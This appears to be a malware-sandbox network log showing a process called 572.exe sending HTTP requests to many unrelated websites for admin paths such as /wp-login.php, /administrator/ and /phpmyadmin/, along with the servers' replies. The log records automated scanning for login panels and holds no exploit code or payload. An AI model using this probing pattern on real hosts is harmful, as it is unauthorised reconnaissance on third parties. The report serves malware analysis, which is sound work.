                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/administrator/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
235 | 192.168.2.6 | 55648 | 138.66.39.205 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706724882 CET | 187 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.934813023 CET | 123 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/administrator/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:16:06.347153902 CET | 196 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.575854063 CET | 132 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
236 | 192.168.2.6 | 55635 | 185.51.191.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.707231045 CET | 183 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011650085 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=23f7eaadf58f82aa563c3935188e436f; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 334e<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
Feb 5, 2024 12:14:52.011668921 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
Feb 5, 2024 12:14:52.011703014 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
Feb 5, 2024 12:14:52.011722088 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ttp://innovationdevelopment.eu/pl/wp-admin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/wp-admin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/wp-admin/" /><link h
Feb 5, 2024 12:14:52.011739016 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="
Feb 5, 2024 12:14:52.011754990 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a>
Feb 5, 2024 12:14:52.012036085 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allowe
Feb 5, 2024 12:14:52.012053967 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: okies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two d
Feb 5, 2024 12:14:52.012072086 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses co
Feb 5, 2024 12:14:52.012089014 CET  1286               IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oter_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35px
Feb 5, 2024 12:14:52.036923885 CET  810                IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="em


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
237         192.168.2.6  55742        186.113.7.204   80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:14:51.710074902 CET  191                OUT        GET /administrator/ HTTP/1.1
Host: oferta.senasofiaplus.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.893454075 CET  154                IN         HTTP/1.0 302 Moved Temporarily
Location: https://oferta.senasofiaplus.edu.co/administrator/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0
Feb 5, 2024 12:16:06.394844055 CET  200                OUT        GET /administrator/index.php HTTP/1.0
Host: oferta.senasofiaplus.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.577948093 CET  158                IN         HTTP/1.0 302 Moved Temporarily
Location: https://oferta.senasofiaplus.edu.co/administrator/index.php
Server: BigIP
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
238 | 192.168.2.6 | 55751 | 18.200.3.224 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.729595900 CET | 175 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hero-wars.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.940295935 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.hero-wars.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
239 | 192.168.2.6 | 56131 | 34.149.46.130 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.818918943 CET | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.921565056 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
240 | 192.168.2.6 | 56077 | 64.190.63.136 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.860414982 CET | 204 | OUT | GET /administrator/?usid=27&utid=4923801068 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww1.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.070002079 CET | 88 | IN | HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
241 | 192.168.2.6 | 56124 | 87.233.198.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.909919024 CET | 186 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.103935003 CET | 123 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
242 | 192.168.2.6 | 55991 | 54.71.181.160 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.926518917 CET | 183 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.098505020 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:14:52.098521948 CET | 97 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
Feb 5, 2024 12:14:52.113080978 CET | 232 | OUT | GET /wp-admin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://ucivirtual.uci.edu.mx/wp-login.php
Feb 5, 2024 12:14:52.300416946 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:14:07 GMT
Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:14:52.300434113 CET | 97 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
243 | 192.168.2.6 | 56241 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.039247036 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.159806967 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:14:52 GMT
Location: https://accounts.google.com/phpmyadmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 183
Server: GSE
Feb 5, 2024 12:14:52.159823895 CET | 183 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
244 | 192.168.2.6 | 56300 | 162.241.203.30 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.048795938 CET | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.176980972 CET | 1114 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
245 | 192.168.2.6 | 56237 | 172.66.43.64 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.053714037 CET | 184 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: nuevopacto.runacode.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.181782961 CET | 666 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:52 GMT
Location: https://nuevopacto.runacode.com/phpMyAdmin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eCct1yLTc7owAZ9%2BZGpsFxroGVhX7fmUisf%2Fzt%2BRhLvVF11CenAZmD0UJ4OBUixZhsORoCZBI%2F8vkoeP7T%2F%2FQCG2VIhwQmK%2B3QUcf25XN1TVeVCYbXMUZiafe%2FhFaNsEZuLKFEI7KKRm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb73abf353e8-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
246 | 192.168.2.6 | 56280 | 170.114.52.4 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.056612968 CET | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: us04web.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.229437113 CET | 1020 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Content-Length: 134
Connection: keep-alive
Location: https://us04web.zoom.us/phpmyadmin/
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=LQ8WoD.SR3VH6INhyLDgKDuFPKFURnPcQUXaG8WNVTE-1707131692-1-AYebvAryME1QooGZcgb2kXEKv/f4PqwsxOVaYN6aNTU5kFxcQpuxSHGBUjF9QHPKh9qL24Jhu1JKRplpPOzwZno=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fbAyBjaIdFkFWV9EkKE7JcJT8MHT8jg58L5kC0a8yLgb3K3YkHh%2FiYMYlP6z2myjGZk0hbqu%2F8R4PlodXI2XsfLffpUsnDYvFKYdPOF%2BxpWVohDNlSSb5UXlK4bh49dtw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb73aace53cc-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
247 | 192.168.2.6 | 56290 | 104.18.32.109 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.056809902 CET | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.191318035 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:07 GMT
Set-Cookie: __cf_bm=C0okAsbog8HQOim82y8A0dtxa1TT2rXKEdpWRiS_Ncw-1707131692-1-AaCCF5wKz+RTseBMX6wyhxHWfFimdvblL3mBq8A5FlJsBiX/igET6K6Q9HB7wJj2EkwqNISYdZqVV4o65q1emC8=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb73aefb1357-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:14:52.191345930 CET | 1286 | IN
Feb 5, 2024 12:14:52.191360950 CET | 261 | IN
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.191375017 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
248 | 192.168.2.6 | 56282 | 172.67.170.147 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.057765961 CET | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: poligrafosecuador.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.331006050 CET | 830 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://poligrafosecuador.com/phpmyadmin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aRMJaVN3kiCs0dbUJ%2BpZNCvrqKfswd6KwHO5wRptrAy%2FX31BimfIk%2BB8WLGtxfdCl8II6LV%2F%2FFQi7XE9HJXs6NTnT%2F1qNlpwzJ57OvFTiYCY2sU7JK4e2K7I2A39jLBdN3o8deOVay4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb73a9491873-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
Feb 5, 2024 12:14:52.331022024 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
249 | 192.168.2.6 | 56343 | 192.185.5.23 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.071402073 CET | 175 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.241880894 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=418220c063cd924bd4bb030f5a62a95a; path=/
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
250 | 192.168.2.6 | 56340 | 138.197.59.199 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.091041088 CET | 184 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.230267048 CET | 564 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: https://api.cmrsanmartin.ziz.cl/phpmyadmin/
Content-Length: 340
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
251 | 192.168.2.6 | 56375 | 13.248.169.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.111229897 CET | 180 | OUT | GET /wp-login.php HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.254216909 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
Connection: keep-alive
ETag: "65b834cc-13b"
